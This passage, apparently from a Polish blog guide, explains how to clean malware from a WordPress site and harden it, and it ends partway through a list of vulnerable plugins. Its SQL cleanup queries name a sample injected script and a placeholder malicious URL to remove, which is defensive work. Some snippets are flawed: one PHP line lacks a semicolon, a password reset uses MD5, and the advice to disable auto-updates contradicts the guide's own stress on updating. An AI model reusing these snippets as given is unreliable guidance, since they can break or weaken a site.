To zapytanie wyszuka wszystkie wystąpienia iframe z danym adresem URL i usunie je.

1. Usunięcie złośliwego kodu JavaScript: Jeśli zidentyfikujesz wstrzyknięte skrypty JavaScript, możesz uruchomić zapytanie:
   UPDATE wp_posts SET post_content = REPLACE(post_content, ‘<script>alert(“hacked”);</script>’, ”);

Możesz dostosować to zapytanie do różnych przypadków, w zależności od kodu, który chcesz usunąć.

1. Usunięcie podejrzanych komentarzy: Jeśli spamerskie komentarze zostały wstrzyknięte do tabeli wp_comments, możesz je usunąć na podstawie określonych słów kluczowych, np. linków do stron phishingowych:
   DELETE FROM wp_comments WHERE comment_content LIKE ‘%http://malicious-site.com%‘;

Optymalizacja i naprawa bazy danych

Po oczyszczeniu złośliwego kodu z bazy danych warto również przeprowadzić optymalizację bazy danych i naprawić ewentualne uszkodzenia spowodowane przez malware.

1. Naprawa bazy danych:
   • W phpMyAdmin zaznacz wszystkie tabele w bazie danych.
   • Z rozwijanego menu wybierz opcję Napraw tabelę (Repair Table). To narzędzie automatycznie naprawi wszelkie uszkodzenia w strukturze tabel.
2. Optymalizacja bazy danych:
   • Po naprawie, wybierz opcję Optymalizuj tabelę (Optimize Table), co pomoże poprawić wydajność bazy danych po usunięciu złośliwego kodu.

Regularne skanowanie bazy danych

Po ręcznym oczyszczeniu bazy danych warto w przyszłości regularnie monitorować jej zawartość, aby zapobiec kolejnym infekcjom. 

Czyszczenie i naprawa bazy danych to kluczowy krok w procesie usuwania malware. Złośliwe oprogramowanie może modyfikować rekordy, wstrzykiwać spamerskie linki, skrypty JavaScript lub backdoory. Dokładna ręczna analiza bazy danych, naprawa uszkodzonych rekordów i usuwanie zainfekowanych danych pozwala na przywrócenie pełnej funkcjonalności strony.

6. Krok 5: Aktualizacja WordPressa, wtyczek i motywów

Po oczyszczeniu plików oraz bazy danych z złośliwego oprogramowania niezwykle ważnym krokiem jest zaktualizowanie WordPressa, wtyczek i motywów do najnowszych wersji. Hakerzy często wykorzystują luki bezpieczeństwa w starszych wersjach WordPressa, wtyczek i motywów, aby wstrzyknąć malware. Dlatego kluczowym elementem zapobiegania przyszłym atakom jest utrzymywanie wszystkich komponentów strony w najnowszych wersjach.

Dodatkowo, ważne jest, aby upewnić się, że strona działa na odpowiedniej wersji PHP, ponieważ starsze wersje mogą zawierać znane luki bezpieczeństwa, które są wykorzystywane przez hakerów.

Aktualizacja rdzenia WordPressa

Pierwszym krokiem jest aktualizacja rdzenia WordPressa do najnowszej dostępnej wersji. Aktualizacje WordPressa nie tylko przynoszą nowe funkcje, ale również wprowadzają poprawki bezpieczeństwa, które mogą chronić Twoją stronę przed nowymi atakami.

Jak zaktualizować WordPress:

1. Zaloguj się do panelu administracyjnego WordPressa (wp-admin).
2. Przejdź do sekcji Kokpit (Dashboard) → Aktualizacje (Updates).
3. Jeśli Twoja wersja WordPressa jest nieaktualna, zobaczysz informację o dostępnej aktualizacji. Kliknij przycisk Zaktualizuj teraz (Update Now).

Po zakończeniu aktualizacji upewnij się, że wszystko działa poprawnie. Czasem aktualizacja może wpłynąć na zgodność wtyczek lub motywów, dlatego ważne jest, aby po każdej aktualizacji dokładnie przetestować stronę.

Sprawdzenie zgodności wtyczek i motywów z nową wersją WordPressa

Po aktualizacji rdzenia WordPressa kluczowe jest, aby wszystkie zainstalowane wtyczki i motywy były kompatybilne z nową wersją. Używanie niekompatybilnych wtyczek lub motywów może prowadzić do błędów na stronie, a co gorsza – może otworzyć nowe luki bezpieczeństwa, które mogą zostać wykorzystane przez hakerów.

Sprawdzenie zgodności wtyczek:

1. Zaloguj się do panelu administracyjnego WordPressa i przejdź do zakładki Wtyczki (Plugins).
2. Dla każdej wtyczki sprawdź, czy dostępna jest aktualizacja. WordPress wyświetli komunikat, jeśli dostępna jest nowa wersja.
3. Kliknij Zaktualizuj teraz (Update Now), aby zainstalować najnowszą wersję każdej wtyczki.
4. Upewnij się, że każda wtyczka jest kompatybilna z najnowszą wersją WordPressa. Informacje o kompatybilności znajdziesz na stronie wtyczki w repozytorium WordPressa.

Sprawdzenie zgodności motywu:

1. Przejdź do zakładki Wygląd (Appearance) → Motywy (Themes).
2. Jeśli dla Twojego motywu dostępna jest aktualizacja, zobaczysz przycisk Aktualizuj teraz (Update Now). Kliknij, aby zaktualizować motyw do najnowszej wersji.
3. Po aktualizacji przetestuj stronę pod kątem zgodności motywu z nową wersją WordPressa. Upewnij się, że motyw działa poprawnie i nie ma problemów z wyświetlaniem lub funkcjonowaniem strony.

Dlaczego zgodność jest kluczowa?

• Nieaktualne lub niekompatybilne wtyczki mogą zawierać luki bezpieczeństwa, które mogą zostać wykorzystane przez hakerów. Niektóre starsze wtyczki mogą być również porzucone przez deweloperów, co oznacza brak wsparcia i brak poprawek.
• Niekompatybilny motyw może powodować problemy z wyświetlaniem strony, a w skrajnych przypadkach może prowadzić do jej całkowitego wyłączenia.

Wymagania dotyczące wersji PHP

Kolejnym kluczowym elementem ochrony strony przed atakami jest zapewnienie, że działa ona na odpowiedniej wersji PHP. Starsze wersje PHP, takie jak 7.3 lub starsze, mogą mieć nieaktualne funkcje i znane luki bezpieczeństwa, które są wykorzystywane przez cyberprzestępców.

Jak sprawdzić i zaktualizować wersję PHP:

1. Sprawdź aktualną wersję PHP:
   • Zaloguj się do panelu administracyjnego hostingu i przejdź do sekcji związanej z wersjami PHP (często znajduje się w zakładce Ustawienia PHP lub PHP Versions).
   • Zobacz, na jakiej wersji PHP działa Twoja strona. Jeśli jest to wersja starsza niż 7.4, zaleca się aktualizację do najnowszej stabilnej wersji (obecnie PHP 8.2 lub 8.3).
2. Aktualizuj PHP na serwerze:
   • W panelu hostingu znajdź opcję zmiany wersji PHP. Większość dostawców hostingu umożliwia zmianę wersji PHP bezpośrednio z panelu.
   • Wybierz najnowszą stabilną wersję PHP (np. PHP 8.2) i zapisz zmiany.

Dlaczego aktualizacja PHP jest ważna?

• Nowsze wersje PHP oferują nie tylko lepszą wydajność, ale również poprawki bezpieczeństwa i wsparcie dla nowoczesnych funkcji. Działa to również na korzyść wydajności strony, ponieważ nowsze wersje PHP są bardziej zoptymalizowane.
• WordPress oraz wiele popularnych wtyczek stopniowo porzuca wsparcie dla starszych wersji PHP, dlatego pozostanie na starej wersji może uniemożliwić aktualizację w przyszłości.

Przetestuj stronę po aktualizacji PHP: Po zmianie wersji PHP dokładnie przetestuj swoją stronę, aby upewnić się, że wszystkie funkcje działają poprawnie. Szczególną uwagę zwróć na kompatybilność z motywami i wtyczkami.

Ostateczna kontrola po aktualizacji

Po zaktualizowaniu rdzenia WordPressa, wtyczek, motywów i wersji PHP, ważne jest przeprowadzenie ostatecznej kontroli:

1. Testuj całą funkcjonalność strony – Przetestuj kluczowe elementy strony, takie jak formularze, strony produktów, system płatności, komentarze, itp., aby upewnić się, że wszystko działa poprawnie.
2. Sprawdź kompatybilność motywów i wtyczek – Dokładnie przetestuj wszystkie motywy i wtyczki, aby upewnić się, że są w pełni zgodne z nową wersją WordPressa i PHP.
3. Zwróć uwagę na wydajność strony – Monitoruj czas ładowania strony i ogólną wydajność po aktualizacji. Nowe wersje PHP i WordPressa mogą znacząco poprawić wydajność strony.

Aktualizacja WordPressa, wtyczek, motywów i wersji PHP to kluczowy krok w zabezpieczaniu strony przed przyszłymi atakami. Nie tylko poprawia to wydajność strony, ale również chroni przed lukami bezpieczeństwa, które są często wykorzystywane w starszych wersjach. Regularne sprawdzanie zgodności wszystkich elementów strony oraz dbanie o jej aktualność to podstawowy element ochrony Twojej witryny WordPress przed cyberzagrożeniami.

6. Krok 6: Zmiana haseł i danych logowania

Po usunięciu złośliwego oprogramowania, oczyszczeniu bazy danych oraz aktualizacji WordPressa i jego komponentów, następnym kluczowym krokiem jest zmiana haseł i danych logowania. Jest to jeden z najważniejszych etapów, który zapobiega dalszemu wykorzystaniu przez atakujących dostępu do Twojej strony. Złośliwe oprogramowanie często wstrzykuje backdoory lub kradnie dane logowania, dlatego należy upewnić się, że wszystkie konta mają nowe, silne hasła.

Konieczna jest zmiana haseł nie tylko dla głównego administratora, ale również dla wszystkich użytkowników, którzy mają dostęp do panelu administracyjnego wp-admin. Obejmuje to wszystkich użytkowników z rolami umożliwiającymi dostęp do zaplecza strony, takie jak: Administrator, Redaktor, Autor, a także Współpracownik, jeśli ma możliwość logowania się do panelu.

Zmiana haseł dla kont WordPressa

Zmiana haseł dla użytkowników WordPressa jest kluczowym krokiem po usunięciu malware. W zależności od liczby użytkowników i ich ról, ten proces może obejmować zarówno administratorów, jak i redaktorów czy autorów.

Jak zmienić hasła dla użytkowników w panelu administracyjnym WordPress:

1. Zaloguj się do panelu administracyjnego WordPressa jako główny administrator.
2. Przejdź do zakładki Użytkownicy (Users) → Wszyscy użytkownicy (All Users).
3. Na liście użytkowników zobaczysz wszystkich użytkowników z różnymi rolami. Skup się na użytkownikach, którzy mają dostęp do panelu administracyjnego, takich jak:
   • Administratorzy (Administrators) – Mają pełny dostęp do strony, w tym do ustawień, wtyczek, motywów i zarządzania treścią.
   • Redaktorzy (Editors) – Mogą publikować i zarządzać postami wszystkich użytkowników.
   • Autorzy (Authors) – Mają możliwość publikowania własnych postów.
   • Współpracownicy (Contributors) – Mogą tworzyć posty, ale wymagają zatwierdzenia przez redaktora lub administratora, aby je opublikować.
4. Dla każdego użytkownika kliknij przycisk Edytuj (Edit), a następnie przewiń do sekcji Zarządzanie hasłem (Password Management).
5. Wygeneruj nowe, silne hasło za pomocą wbudowanego generatora haseł WordPressa lub ręcznie wpisz nowe hasło. Upewnij się, że hasło spełnia następujące kryteria:
   • Jest długie (minimum 12 znaków).
   • Zawiera duże i małe litery, cyfry oraz znaki specjalne.
6. Po zakończeniu kliknij przycisk Zapisz zmiany (Update User), aby zapisać nowo utworzone hasło.

Ważne: Powtórz ten proces dla wszystkich użytkowników, którzy mają dostęp do panelu administracyjnego WordPressa. Zabezpieczenie tylko konta administratora nie wystarczy, ponieważ inne konta, takie jak redaktorzy i autorzy, mogą być potencjalnym celem ataku.

Wymuszenie zmiany haseł przez wszystkich użytkowników

Aby zapewnić pełne bezpieczeństwo, zaleca się wymuszenie zmiany haseł przez wszystkich użytkowników, którzy mają dostęp do panelu administracyjnego. Można to zrobić ręcznie, informując użytkowników o konieczności zmiany hasła, lub poprzez wykorzystanie specjalnych narzędzi.

Jak wymusić zmianę haseł:

1. Ręczne powiadomienie użytkowników:
   • Wyślij wiadomość e-mail do wszystkich użytkowników z rolą umożliwiającą dostęp do panelu administracyjnego (Administrator, Redaktor, Autor, Współpracownik), informując o konieczności zmiany hasła z powodu incydentu bezpieczeństwa.
   • Upewnij się, że dostarczasz jasne instrukcje dotyczące logowania i zmiany hasła.
2. Zresetowanie haseł wszystkich użytkowników (ręcznie w bazie danych): Jeśli chcesz zresetować hasła dla wszystkich użytkowników, możesz to zrobić bezpośrednio w bazie danych, korzystając z phpMyAdmin lub podobnego narzędzia. Przykład zapytania SQL do zresetowania hasła użytkownika:
   UPDATE wp_users SET user_pass = MD5(‘newpassword’) WHERE user_login = ‘username’;

Zmień newpassword na nowe hasło, a username na nazwę użytkownika, którego hasło chcesz zresetować.

Zmiana haseł dostępowych do bazy danych, FTP i panelu hostingu

Po zresetowaniu haseł użytkowników WordPressa ważne jest również zaktualizowanie haseł dostępu do innych kluczowych zasobów, takich jak baza danych, konta FTP i panel hostingu. Złośliwe oprogramowanie mogło naruszyć bezpieczeństwo tych danych, dlatego ich aktualizacja jest niezbędna.

Jak zmienić hasła dostępu do kluczowych zasobów:

1. Zmiana hasła do bazy danych:
   • Zaloguj się do panelu hostingu i przejdź do zarządzania bazami danych (często jest to w sekcji MySQL Databases).
   • Zmień hasło do bazy danych używanej przez WordPress.
   • Po zmianie hasła do bazy danych zaktualizuj plik wp-config.php na serwerze. Otwórz ten plik i edytuj linijkę z hasłem do bazy danych:
     define(‘DB_PASSWORD’, ‘new_db_password’);
   • Zapisz plik i prześlij go na serwer.
2. Zmiana haseł FTP i SFTP:
   • Zaloguj się do panelu hostingu i przejdź do sekcji zarządzania kontami FTP.
   • Zaktualizuj hasła wszystkich kont FTP i SFTP, które mają dostęp do plików WordPressa.
   • Upewnij się, że nowe hasła są silne i zgodne z zaleceniami dotyczącymi tworzenia silnych haseł.
3. Zmiana hasła do panelu hostingu:
   • Zaloguj się do panelu administracyjnego swojego hostingu.
   • Zmień hasło do konta głównego hostingu, aby zabezpieczyć dostęp do wszystkich usług hostingowych, takich jak bazy danych, FTP i inne usługi.

Włączenie dwuetapowej weryfikacji (2FA)

Aby dodatkowo zabezpieczyć swoją stronę, zaleca się włączenie dwuetapowej weryfikacji (2FA) dla wszystkich kont z dostępem do panelu administracyjnego WordPressa. 2FA dodaje dodatkową warstwę zabezpieczeń, wymagając od użytkowników potwierdzenia logowania za pomocą jednorazowego kodu wysyłanego na telefon lub aplikację.

Jak włączyć 2FA:

1. Zainstaluj aplikację 2FA – Skonfiguruj 2FA dla każdego użytkownika WordPressa z dostępem do panelu administracyjnego za pomocą aplikacji takiej jak Google Authenticator, Authy, czy Microsoft Authenticator.
2. Skonfiguruj 2FA w WordPressie – Zaloguj się do panelu administracyjnego i włącz 2FA dla użytkowników. Możesz to zrobić za pomocą wtyczki lub wbudowanych funkcji WordPressa (jeśli dostępne). Upewnij się, że użytkownicy wiedzą, jak skonfigurować aplikację 2FA.

Zmiana haseł i danych logowania to krytyczny krok w zabezpieczeniu Twojej strony WordPress po ataku malware. Należy zaktualizować hasła dla wszystkich użytkowników z dostępem do panelu administracyjnego, jak również do kluczowych zasobów, takich jak baza danych, FTP i panel hostingu. Aby dodatkowo zwiększyć poziom bezpieczeństwa, warto włączyć dwuetapową weryfikację (2FA), co znacznie utrudni hakerom dostęp do Twojej strony. Zadbaj o to, aby wszystkie nowe hasła były silne, unikalne i zgodne z najlepszymi praktykami bezpieczeństwa.

7. Krok 7: Zapobieganie przyszłym infekcjom

Po usunięciu złośliwego oprogramowania, oczyszczeniu plików i bazy danych oraz przywróceniu strony do pełnej funkcjonalności, kluczowym krokiem jest zabezpieczenie witryny przed przyszłymi infekcjami. WordPress, będąc jednym z najpopularniejszych systemów zarządzania treścią, jest częstym celem ataków hakerów, dlatego proaktywne zabezpieczenie strony jest niezbędne, aby uniknąć ponownych problemów. W tej części omówimy najlepsze praktyki i kroki, które pomogą zabezpieczyć stronę przed przyszłymi atakami.

Krok 1: Konfiguracja ograniczeń dostępu do plików, folderów i panelu administracyjnego

Jednym z kluczowych aspektów zabezpieczenia strony jest ograniczenie dostępu do plików i folderów oraz ukrycie wszelkich inoramcji o Naszej witrynie takich jak np. wersja aktualnie używanego Wordpresa. Hakerzy często wykorzystują luki w uprawnieniach do plików, aby zyskać nieautoryzowany dostęp do strony, wstrzyknąć złośliwy kod lub przejąć kontrolę nad systemem. Możliwość prostego sprawdzenia wersji Naszego wordpressa też znacznie ułatwia potencjalne znalezienie luki w Naszej stronie.

1. Ograniczenie dostępu do plików i folderów:

• • Plik wp-config.php – Ten plik zawiera wrażliwe informacje o bazie danych, takie jak nazwa bazy, użytkownik i hasło. Powinien być chroniony przed nieautoryzowanym dostępem.
    Zalecenie: Ustaw uprawnienia pliku wp-config.php na 600, co ograniczy dostęp do pliku tylko dla właściciela.
  • Foldery i pliki rdzeniowe WordPressa – Uprawnienia powinny być ustawione tak, aby uniemożliwić zapisywanie i edytowanie plików przez nieautoryzowane osoby. Zasadniczo:
    • Katalogi powinny mieć uprawnienia 755.
    • Pliki powinny mieć uprawnienia 644.

• Dane bazy danych

• • W pliku wp-config.php znajdź:

    // ** Database settings - You can get this info from your web host ** //
    /** The name of the database for WordPress */
    define( 'DB_NAME', 'database_name_here' );
    
    /** Database username */
    define( 'DB_USER', 'username_here' );
    
    /** Database password */
    define( 'DB_PASSWORD', 'password_here' );
    
    /** Database hostname */
    define( 'DB_HOST', 'localhost' );
    
    /** Database charset to use in creating database tables. */
    define( 'DB_CHARSET', 'utf8' );
    
    /** The database collate type. Don't change this if in doubt. */
    define( 'DB_COLLATE', '' );

• skopiuj do innego pliku np. wp-config-db.php
• W miejsce usuniętego kod wklej: require_once “wp-config-db.php”;

• Ukryj wyświetlanie błędów

• W pliku wp-config.php znajdź:
  define(‘WP_DEBUG’, false);

• • Zamień na:
    define(‘WP_DEBUG’, false);

    if ( ! WP_DEBUG ) {
        ini_set('display_errors', 0);
    }

• Wyłącz edytor plików

• W tym samym pliku wp-config.php dopisz poniżej:
  define(‘DISALLOW_FILE_EDIT’, true);

• Zablokoju informacje o Twojej witrynie:

• W pliku .htaccess dopisz na początku:
  <FilesMatch “wp-config.*\.php|\.htaccess|readme\.html”>
  Require all denied
  </FilesMatch>

• • Usuń wersję z sekcji head:
    • W pliku functions.php Twojego motywu dodaj na końcu:

      remove_action('wp_head', 'wp_generator');
      function my_secure_generator( $generator, $type ) {
          return '';
      }
      
      add_filter( 'the_generator', 'my_secure_generator', 10, 2 );
      function my_remove_src_version( $src ) {
          global $wp_version;
          $version_str = '?ver='.$wp_version;
          $offset = strlen( $src ) - strlen( $version_str );
          if ( $offset >= 0 && strpos($src, $version_str, $offset) !== FALSE )  {
              return substr( $src, 0, $offset );
          }
          
       return $src;
      }
      add_filter( 'script_loader_src', 'my_remove_src_version' );
      add_filter( 'style_loader_src', 'my_remove_src_version' );

• W tym samym pliku, aby wyłączyć XMLRPC dodaj:
  

  add_filter('xmlrpc_enabled', '__return_false');

• Chroń wp-includes
  • Dodaj plik .htaccess i umieść w nim kod:

    <FilesMatch "\.(?i:php)$">
     Require all denied
    </FilesMatch>
    <Files "wp-tinymce.php">
     Require all granted
    </Files>
    
    <Files "ms-files.php">
     Require all granted
    </Files>

• Chroń wp-content oraz wp-content/uploads
  • Do obydwu ścieżek dodaj plik .htaccess z zawartością:
    

    <FilesMatch "\.(?i:php)$">
     Require all denied
    </FilesMatch>

• Zablokuj automatyczne aktualizacje. Sam kontroluj co i kiedy będzie aktualizowane!
  • Do pliku wp-config.php dodaj na sam koniec:
    define( ‘WP_AUTO_UPDATE_CORE’, false );
  • W pliku functions.php Twojego motywu dodaj:
    

    add_filter( 'auto_update_plugin', '__return_false' )
    add_filter( 'auto_update_theme', '__return_false' );

Czego nie warto?

Niektóre porady, choć popularne, nie zawsze przynoszą oczekiwane efekty w zakresie bezpieczeństwa strony WordPress. Oto kilka, których lepiej unikać:

• Nie używaj “kombajnów” do bezpieczeństwa
  Narzędzia typu “wszystko w jednym” do ochrony strony mogą wydawać się kuszące, ale w rzeczywistości:
  • Są często podatne na luki w zabezpieczeniach.
  • Dają fałszywe poczucie bezpieczeństwa, które może prowadzić do zaniedbań w bardziej krytycznych obszarach.
• Nie zmieniaj ścieżki wp-admin
  Zmiana domyślnej ścieżki do panelu administracyjnego nie zapewnia lepszego bezpieczeństwa:
  • Atakujący i tak znajdą alternatywne ścieżki, jak /admin czy /login.
  • Ścieżki do wp-login.php i xmlrpc.php są szybciej przetwarzane przez serwer niż błędy 404, co oszczędza zasoby.

8. Krok 8: Weryfikacja i zgłoszenie do Google

Po usunięciu złośliwego oprogramowania i przywróceniu strony do pełnej funkcjonalności, ważnym krokiem jest weryfikacja, czy strona jest już całkowicie czysta, oraz zgłoszenie jej do Google w celu usunięcia ewentualnych ostrzeżeń wyświetlanych w wynikach wyszukiwania. Google, jeśli wykryje malware na stronie, może oznaczyć ją jako niebezpieczną, co skutkuje spadkiem ruchu oraz zaufania użytkowników.

Krok 1: Weryfikacja czystości strony

Zanim zgłosisz stronę do Google, upewnij się, że jest całkowicie oczyszczona z malware. Użyj narzędzi diagnostycznych oraz ręcznie zweryfikuj, czy nie pozostały żadne ślady infekcji.

Jak zweryfikować czystość strony:

1. Skanowanie strony:
   • Ponownie skorzystaj z narzędzi do skanowania plików i bazy danych, takich jak PHP Malware Scanner lub PHP-Antimalware-Scanner.
   • Sprawdź, czy narzędzia nie wykazują żadnych nowych podejrzanych plików lub kodu.
2. Sprawdzenie Google Safe Browsing:
   • Google oferuje usługę Safe Browsing, która informuje o statusie Twojej strony. Możesz skorzystać z narzędzia, odwiedzając stronę:
   • Google Safe Browsing i wpisując adres swojej strony.
   • Jeśli strona została oznaczona jako niebezpieczna, Google wskaże szczegóły infekcji.

Zgłoszenie do Google do ponownej oceny

Jeśli Twoja strona została wcześniej oznaczona jako niebezpieczna, musisz zgłosić ją do ponownej oceny, aby Google usunęło ostrzeżenia z wyników wyszukiwania. Proces ten odbywa się poprzez Google Search Console.

Jak zgłosić stronę do Google:

1. Zaloguj się do Google Search Console:
   • Jeśli jeszcze nie masz konta, musisz najpierw zweryfikować własność strony. W tym celu dodaj swoją witrynę do Google Search Console i skorzystaj z jednej z metod weryfikacji (np. wgranie pliku HTML lub dodanie rekordu DNS).
2. Sprawdzenie problemów z bezpieczeństwem:
   • Po zalogowaniu się do Google Search Console, przejdź do sekcji Bezpieczeństwo i ręczne działania (Security & Manual Actions).
   • Sprawdź, czy Twoja strona jest oznaczona jako zainfekowana lub niebezpieczna. Google zazwyczaj pokaże szczegóły dotyczące wykrytej infekcji.
3. Zgłoszenie prośby o ponowną ocenę:
   • Jeśli usunąłeś złośliwe oprogramowanie, kliknij przycisk Zgłoś prośbę o ponowną ocenę (Request a Review).
   • W swoim zgłoszeniu opisz, jakie działania podjąłeś, aby usunąć malware, np. „Oczyściliśmy wszystkie zainfekowane pliki, zaktualizowaliśmy WordPressa i wtyczki oraz przeprowadziliśmy pełne skanowanie serwera”.
4. Oczekiwanie na odpowiedź Google:
   • Po wysłaniu zgłoszenia Google przeanalizuje Twoją stronę i w ciągu kilku dni poinformuje Cię o wyniku. Jeśli strona zostanie uznana za bezpieczną, ostrzeżenia zostaną usunięte z wyników wyszukiwania.

Monitorowanie po zgłoszeniu

Po zgłoszeniu strony do Google i usunięciu ostrzeżeń warto regularnie monitorować status witryny oraz bezpieczeństwo, aby zapobiec przyszłym infekcjom.

Jak monitorować stan strony:

• Google Search Console – Regularnie sprawdzaj sekcję Bezpieczeństwo i ręczne działania, aby upewnić się, że strona nie jest ponownie oznaczona jako niebezpieczna.
• Monitorowanie logów serwera – Śledzenie logów serwera (dostępnych w panelu hostingu) pomoże wykrywać nietypowe działania na stronie.

Weryfikacja i zgłoszenie strony do Google to końcowy, ale niezwykle ważny etap procesu oczyszczania po ataku malware. Dzięki temu możesz usunąć ostrzeżenia wyświetlane użytkownikom oraz przywrócić reputację Twojej strony w wyszukiwarce. Zgłoszenie do Google za pośrednictwem Search Console zapewnia, że strona zostanie ponownie oceniona jako bezpieczna, co jest kluczowe dla przywrócenia zaufania użytkowników i poprawy ruchu na stronie.

Podsumowanie

Zarządzanie stroną WordPress wymaga nie tylko dbania o jej funkcjonalność, ale przede wszystkim o bezpieczeństwo. Infekcje malware mogą prowadzić do poważnych konsekwencji, w tym utraty danych, spadku reputacji, a także obniżenia pozycji strony w wynikach wyszukiwania. W artykule przeprowadziliśmy szczegółowy przewodnik dotyczący usuwania malware z WordPressa i przywracania pełnej funkcjonalności strony. Każdy krok w tym procesie jest kluczowy dla skutecznej eliminacji zagrożeń oraz zapobiegania przyszłym atakom.

Kluczowe kroki w procesie usuwania malware i przywracania bezpieczeństwa:

1. Diagnoza problemu – Zidentyfikowanie infekcji za pomocą narzędzi do skanowania oraz ręczna analiza podejrzanych plików. Dzięki temu możemy dowiedzieć się, jak głęboko malware wniknęło w naszą stronę.
2. Izolacja i kopia zapasowa – Zanim podejmiesz jakiekolwiek kroki naprawcze, wyłącz stronę i stwórz pełną kopię zapasową, aby zminimalizować ryzyko utraty danych.
3. Usuwanie złośliwego oprogramowania – Ręczne usunięcie podejrzanych plików, przywrócenie oryginalnych plików WordPressa oraz dogłębna analiza katalogu wp-content, gdzie najczęściej ukrywa się złośliwy kod.
4. Oczyszczenie i naprawa bazy danych – Złośliwe oprogramowanie może również wnikać do bazy danych, dlatego konieczna jest analiza i usunięcie złośliwych wpisów, a następnie naprawa bazy.
5. Aktualizacja WordPressa, wtyczek i motywów – Regularne aktualizacje komponentów strony są kluczowe, ponieważ często naprawiają znane luki w zabezpieczeniach, które hakerzy mogą wykorzystywać.
6. Zmiana haseł i danych logowania – Po usunięciu infekcji należy zmienić hasła wszystkich użytkowników, którzy mają dostęp do panelu administracyjnego, oraz hasła do FTP, bazy danych i konta hostingowego.
7. Weryfikacja i zgłoszenie do Google – Po oczyszczeniu strony zgłoś ją do Google, aby ostrzeżenia o złośliwym oprogramowaniu zostały usunięte z wyników wyszukiwania.
8. Zapobieganie przyszłym infekcjom – Skuteczne zabezpieczenie strony przed kolejnymi atakami wymaga ograniczenia dostępu do plików, folderów i panelu administracyjnego, regularnych kopii zapasowych oraz monitorowania aktywności strony.

Kluczowe zasady zapobiegania przyszłym infekcjom:

• Utrzymuj WordPress, wtyczki i motywy zawsze zaktualizowane do najnowszej wersji.
• Ogranicz dostęp do panelu administracyjnego (wp-admin) za pomocą ograniczeń IP oraz dodatkowego hasła.
• Regularnie twórz kopie zapasowe i sprawdzaj, czy kopie można przywrócić w razie problemów.
• Zaktualizuj PHP do najnowszej stabilnej wersji oraz upewnij się, że Twój serwer spełnia współczesne standardy bezpieczeństwa.
• Monitoruj serwer i ruch na stronie, korzystając z narzędzi do wykrywania nietypowych działań, które mogą świadczyć o potencjalnych atakach.

Pamiętaj, że choć usunięcie złośliwego oprogramowania jest czasochłonnym procesem, wprowadzenie odpowiednich zabezpieczeń zapobiegnie kolejnym atakom i oszczędzi wiele problemów w przyszłości.

Dodatkowe zasoby

Aby jeszcze lepiej zabezpieczyć swoją stronę i zrozumieć, jak działać w przypadku zagrożeń, skorzystaj z poniższych zasobów. Znajdziesz tutaj narzędzia, dokumentację oraz przydatne poradniki, które pomogą Ci w dalszym administrowaniu stroną i ochronie przed atakami.

Narzędzia do diagnozowania i usuwania malware:

1. PHP Malware Scanner – Open-source’owe narzędzie do skanowania plików PHP w poszukiwaniu złośliwego kodu. Doskonałe do ręcznego skanowania serwera i analizowania podejrzanych plików.
2. PHP-Antimalware-Scanner – Skuteczne narzędzie do wykrywania i usuwania złośliwego oprogramowania w plikach PHP, z regularnie aktualizowaną bazą zagrożeń.
3. Google Safe Browsing – Sprawdź status swojej strony i upewnij się, że nie została oznaczona jako niebezpieczna przez Google.

Poradniki i dokumentacja:

1. WordPress Codex – Oficjalna dokumentacja WordPressa. Znajdziesz tam szczegółowe wskazówki dotyczące konfiguracji serwera, bazy danych i plików WordPressa.
2. PHP Security Best Practices – Poradnik dotyczący najlepszych praktyk zabezpieczania aplikacji PHP, w tym jak unikać typowych luk w zabezpieczeniach PHP.
3. Prezentacja: Wyczaruj sobie spokój – Prezentacja dotycząca bezpieczeństwa WordPressa, zawierająca szczegółowe porady oparte na realnych zagrożeniach i sposobach ich neutralizacji. Prezentacja choć nie jest aktualna to dostarczy potrzebną wiedzę i uświadomi jakie akcje należy podjąć. 

Narzędzia do tworzenia kopii zapasowych:

1. UpdraftPlus – Popularne narzędzie do tworzenia kopii zapasowych, które automatycznie zapisuje pliki strony i bazę danych w chmurze.
2. Duplicator – Narzędzie do ręcznego tworzenia kopii zapasowych oraz migracji stron WordPress.
3. BackupBuddy – Kompleksowe rozwiązanie do backupu, umożliwiające regularne tworzenie kopii zapasowych oraz ich szybkie przywracanie.
   
   ** Pamiętaj, aby nie pozostawiać tych narzędzi stale aktywnych. Niosą ze sobą pewne podatności.

Narzędzia do testowania i monitorowania bezpieczeństwa:

1. SSL Labs Server Test – Narzędzie do testowania konfiguracji SSL/TLS na Twoim serwerze, aby upewnić się, że połączenia z witryną są bezpieczne.
2. New Relic – Zaawansowane narzędzie do monitorowania wydajności i bezpieczeństwa strony, które pomoże w identyfikacji problemów z wydajnością i potencjalnych zagrożeń.
3. Google Search Console – Niezbędne narzędzie do zarządzania obecnością strony w wynikach wyszukiwania Google i monitorowania ewentualnych problemów z bezpieczeństwem.

Zapobieganie przyszłym infekcjom to proces ciągły, dlatego regularne aktualizacje, monitorowanie oraz wdrażanie sprawdzonych praktyk bezpieczeństwa są kluczowe w długoterminowym zabezpieczeniu Twojej strony WordPress przed zagrożeniami. Korzystając z powyższych zasobów i narzędzi, będziesz w stanie skutecznie chronić swoją stronę i reagować na ewentualne zagrożenia zanim staną się problemem.

Dodatkowa porcja wiedzy

Świadomość zagrożeń oraz znajomość wtyczek, które są bardziej podatne na ataki, może pomóc Ci skutecznie zabezpieczyć swoją stronę WordPress. Hakerzy często wykorzystują luki w wtyczkach, dlatego regularne aktualizowanie tych komponentów strony jest kluczowe. Poniżej znajduje się lista 20 najbardziej podatnych wtyczek, które w przeszłości były celem ataków, a ich niewłaściwe zabezpieczenie może doprowadzić do infekcji strony.

20 najbardziej podatnych wtyczek WordPressa:

1. Contact Form 7
   • Jedna z najpopularniejszych wtyczek do tworzenia formularzy kontaktowych, często padała ofiarą ataków przez luki związane z przesyłaniem plików.
2. RevSlider (Slider Revolution)
   • W przeszłości zawierała poważne luki, które umożliwiały przejęcie kontroli nad stroną. Obecnie regularnie aktualizowana, ale nadal stanowi zagrożenie, jeśli jest używana w starszej wersji.
3. WP GDPR Compliance
   • Wtyczka do zarządzania zgodnością z RODO. Wcześniej wykryto lukę umożliwiającą atakującym zarejestrowanie nieautoryzowanego konta administratora.
4. Duplicator
   • Popularna wtyczka do migracji stron. Starsze wersje miały luki pozwalające na kradzież danych z kopii zapasowych.
5. WooCommerce
   • Bardzo popularna wtyczka do e-commerce, która ze względu na swoją popularność była częstym celem ataków związanych z wstrzykiwaniem kodu SQL.
6. Yoast SEO
   • Popularna wtyczka do optymalizacji SEO. W przeszłości zawierała luki umożliwiające cross-site scripting (XSS), jednak jest na bieżąco aktualizowana.
7. Ultimate Member
